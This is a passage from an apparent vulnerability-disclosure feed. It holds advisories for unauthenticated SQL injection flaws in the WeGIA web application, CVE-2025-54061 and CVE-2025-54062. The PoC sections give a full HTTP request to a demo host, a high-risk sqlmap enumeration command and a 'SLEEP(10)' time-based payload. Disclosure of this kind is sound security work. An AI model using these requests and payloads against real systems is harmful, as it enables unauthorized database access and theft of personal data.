&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-54060/image.png&amp;#34;
	width=&amp;#34;867&amp;#34;
	height=&amp;#34;782&amp;#34;
	srcset=&amp;#34;/p/cve-2025-54060/image_hu_1d34c10199db05d0.png 480w, /p/cve-2025-54060/image_hu_ce851de59c9a32ae.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;110&amp;#34;
		data-flex-basis=&amp;#34;266px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mw78-c4f6-2hq7&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mw78-c4f6-2hq7&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 17 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54061</title>
        <link>https://www.cvehunters.com/p/cve-2025-54061/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-54061/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54061-sql-injection-blind-time-based-vulnerability-in-idatendido_familiares-parameter-on-dependente_editardocphp-endpoint&amp;#34;&amp;gt;CVE-2025-54061: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;dependente_editarDoc.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54061&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54061&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/html/funcionario/dependente_editarDoc.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54061-sql-injection-blind-time-based-vulnerability-in-idatendido_familiares-parameter-on-dependente_editardocphp-endpoint&amp;#34;&amp;gt;CVE-2025-54061: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;dependente_editarDoc.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54061&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54061&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/html/funcionario/dependente_editarDoc.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/funcionario/dependente_editarDoc.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Save the request in &amp;lt;code&amp;gt;req.txt&amp;lt;/code&amp;gt; file:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  POST /html/funcionario/dependente_editarDoc.php?id_pessoa=3&amp;amp;amp;idatendido_familiares=1 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Host: demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Content-Length: 82
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Origin: https://demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Referer: https://demo.wegia.org/html/funcionario/profile_dependente.php?id_dependente=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Cookie: _ga_F8DXBXLV8J=GS2.1.s1751259204$o23$g0$t1751259204$j60$l0$h0; _ga=GA1.1.424189364.1749063834; PHPSESSID=bv1jv0i5nijrv1a3dkkimbp270
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  rg=56.242.1&amp;amp;amp;orgao_emissor=Uni%C3%A3o1&amp;amp;amp;data_expedicao=2005-06-06&amp;amp;amp;cpf=495.852.710-95
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Then, use &amp;lt;code&amp;gt;sqlmap&amp;lt;/code&amp;gt;:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  sqlmap -r req.txt -p idatendido_familiares --risk=3 --level=5 --dbs --batch --dbms=mysql --batch
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-54061/image.png&amp;#34;
	width=&amp;#34;862&amp;#34;
	height=&amp;#34;755&amp;#34;
	srcset=&amp;#34;/p/cve-2025-54061/image_hu_fe6010bc9adac3a1.png 480w, /p/cve-2025-54061/image_hu_b23a08e91a8f8039.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;114&amp;#34;
		data-flex-basis=&amp;#34;274px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g47q-vfpj-g9mr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g47q-vfpj-g9mr&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 17 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54062</title>
        <link>https://www.cvehunters.com/p/cve-2025-54062/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-54062/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54062-sql-injection-vulnerability-in-id_dependente-parameter-on-profile_dependentephp-endpoint&amp;#34;&amp;gt;CVE-2025-54062: SQL Injection Vulnerability in &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;profile_dependente.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54062&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54062&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/html/funcionario/profile_dependente.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54062-sql-injection-vulnerability-in-id_dependente-parameter-on-profile_dependentephp-endpoint&amp;#34;&amp;gt;CVE-2025-54062: SQL Injection Vulnerability in &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;profile_dependente.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54062&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54062&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/html/funcionario/profile_dependente.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/funcionario/profile_dependente.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &#43;AND&#43;SLEEP(10)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-54062/image.png&amp;#34;
	width=&amp;#34;1313&amp;#34;
	height=&amp;#34;775&amp;#34;
